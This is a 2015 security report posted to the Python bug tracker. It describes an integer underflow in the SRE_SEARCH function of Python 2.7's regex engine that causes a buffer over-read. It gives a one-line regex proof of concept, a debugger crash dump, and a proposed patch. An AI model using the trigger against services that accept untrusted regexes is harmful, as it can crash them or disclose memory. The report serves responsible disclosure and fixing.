[New-bugs-announce] [issue24602] SRE_SEARCH Integer Underflow

JohnLeitch report at bugs.python.org
Fri Jul 10 05:12:53 CEST 2015 

New submission from JohnLeitch:

The Python 2.7 regular expression module suffers from an integer underflow in the SRE_SEARCH function of _sre.c, which leads to a buffer over-read condition. The issue is caused by unchecked subtraction performed while handling SR_OP_INFO blocks:

    if (pattern[0] == SRE_OP_INFO) {
        /* optimization info block */
        /* <INFO> <1=skip> <2=flags> <3=min> <4=max> <5=prefix info>  */

        flags = pattern[2];

        if (pattern[3] > 1) {
            /* adjust end point (but make sure we leave at least one
               character in there, so literal search will work) */
            end -= pattern[3]-1; <<<< Pattern[3] is a potentially untrusted value
                                      controllable via regex.
            if (end <= ptr) <<<< A check is performed end is less than or equal to
                                 ptr (which is still start at this point), but no
                                 check is performed to determine if end has been
                                 underflowed to a value greater than ptr.
                end = ptr+1;
        }

        [...]
    }

A script that demonstrates control of Pattern[3] is as follows:

import re
re.search(r"\b((A){304665458})",u"A")

When the script is executed, the min quantifier value ends up in pattern[3] of an SRE_OP_INFO block. The value underflows end, resulting in a large number that satisfies the existing validation. In cases where the regular expression is exposed as attack surface, it may be possible to exploit this vulnerability to scan and read arbitrary memory. This could then potentially be used to disclose secrets and/or bypass mitigations such as ASLR/DEP.

An exception produced by this condition is as follows:

0:000> !analyze -v -nodb
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


FAULTING_IP: 
python27!sre_uat+b7 [c:\build27\cpython\modules\_sre.c @ 369]
1e010dd7 0fb746fe        movzx   eax,word ptr [esi-2]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 1e010dd7 (python27!sre_uat+0x000000b7)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 01e0f000
Attempt to read from address 01e0f000

CONTEXT:  00000000 -- (.cxr 0x0;r)
eax=01d38518 ebx=0027f8b0 ecx=0027f8b0 edx=01d23eb4 esi=01e0f002 edi=01d3851a
eip=1e010dd7 esp=0027f82c ebp=01f2b010 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010212
python27!sre_uat+0xb7:
1e010dd7 0fb746fe        movzx   eax,word ptr [esi-2]     ds:002b:01e0f000=????

FAULTING_THREAD:  00000518

DEFAULT_BUCKET_ID:  INVALID_POINTER_READ

PROCESS_NAME:  python.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  01e0f000

READ_ADDRESS:  01e0f000 

FOLLOWUP_IP: 
python27!sre_uat+b7 [c:\build27\cpython\modules\_sre.c @ 369]
1e010dd7 0fb746fe        movzx   eax,word ptr [esi-2]

NTGLOBALFLAG:  70

APPLICATION_VERIFIER_FLAGS:  0

APP:  python.exe

ANALYSIS_VERSION: 6.3.9600.17029 (debuggers(dbg).140219-1702) x86fre

PRIMARY_PROBLEM_CLASS:  INVALID_POINTER_READ

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ

LAST_CONTROL_TRANSFER:  from 1e0115e8 to 1e010dd7

STACK_TEXT:  
0027f834 1e0115e8 01d23eb4 0027f8b0 01e0f004 python27!sre_uat+0xb7
0027f85c 1e012882 01d23e78 01ddb9f0 00000000 python27!sre_umatch+0x178
0027f888 1e014995 01d23eb4 1e0148b0 01f3ea08 python27!sre_usearch+0x212
0027fc08 1e0aafeb 01d23e78 01ddb9f0 00000000 python27!pattern_search+0xe5
0027fc24 1e0edd10 01f3ea08 01ddb9f0 00000000 python27!PyCFunction_Call+0x5b
0027fc50 1e0f017a 0027fca8 01d9df98 00000001 python27!call_function+0x2b0
0027fcc0 1e0f1150 01f49198 00000000 01dce030 python27!PyEval_EvalFrameEx+0x239a
0027fcf4 1e0ec862 01d9df98 01f49198 00000000 python27!PyEval_EvalCodeEx+0x690
0027fd30 1e0edd87 0027fdb4 00000002 00000000 python27!fast_function+0xe2
0027fd5c 1e0f017a 0027fdb4 01d46b18 01d46b18 python27!call_function+0x327
0027fdcc 1e0f1150 01d74030 00000000 01d46b18 python27!PyEval_EvalFrameEx+0x239a
0027fe00 1e0f11b2 01d46b18 01d74030 01d4aa50 python27!PyEval_EvalCodeEx+0x690
0027fe2c 1e11707a 01d46b18 01d4aa50 01d4aa50 python27!PyEval_EvalCode+0x22
0027fe44 1e1181c5 01e0a3b0 01d4aa50 01d4aa50 python27!run_mod+0x2a
0027fe64 1e118760 68e87408 01f02e63 00000101 python27!PyRun_FileExFlags+0x75
0027fea4 1e1190d9 68e87408 01f02e63 00000001 python27!PyRun_SimpleFileExFlags+0x190
0027fec0 1e038d35 68e87408 01f02e63 00000001 python27!PyRun_AnyFileExFlags+0x59
0027ff3c 1d00116d 00000002 01f02e40 01f01928 python27!Py_Main+0x965
0027ff80 75847c04 7ffde000 75847be0 ba7d18ea python!__tmainCRTStartup+0x10f
0027ff94 77c9b90f 7ffde000 b83a1635 00000000 KERNEL32!BaseThreadInitThunk+0x24
0027ffdc 77c9b8da ffffffff 77c80707 00000000 ntdll!__RtlUserThreadStart+0x2f
0027ffec 00000000 1d001314 7ffde000 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND:  .cxr 0x0 ; kb

FAULTING_SOURCE_LINE:  c:\build27\cpython\modules\_sre.c

FAULTING_SOURCE_FILE:  c:\build27\cpython\modules\_sre.c

FAULTING_SOURCE_LINE_NUMBER:  369

FAULTING_SOURCE_CODE:  
   365:     case SRE_AT_BOUNDARY:
   366:         if (state->beginning == state->end)
   367:             return 0;
   368:         thatp = ((void*) ptr > state->beginning) ?
>  369:             SRE_IS_WORD((int) ptr[-1]) : 0;
   370:         thisp = ((void*) ptr < state->end) ?
   371:             SRE_IS_WORD((int) ptr[0]) : 0;
   372:         return thisp != thatp;
   373: 
   374:     case SRE_AT_NON_BOUNDARY:


SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  python27!sre_uat+b7

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: python27

IMAGE_NAME:  python27.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  5488ac17

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_python27.dll!sre_uat

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_python27!sre_uat+b7

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:invalid_pointer_read_c0000005_python27.dll!sre_uat

FAILURE_ID_HASH:  {a7161322-9fae-40b8-8c7f-dd4ebe6d6b79}

Followup: MachineOwner
---------

To fix this issue, SRE_SEARCH should check end following the subtraction operation to ensure that the value has not underflowed. A proposed patch is attached.

----------
components: Regular Expressions
files: _sre.c.patch
keywords: patch
messages: 246540
nosy: JohnLeitch, ezio.melotti, mrabarnett
priority: normal
severity: normal
status: open
title: SRE_SEARCH Integer Underflow
type: security
versions: Python 2.7
Added file: http://bugs.python.org/file39887/_sre.c.patch

_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue24602>
_______________________________________

More information about the New-bugs-announce mailing list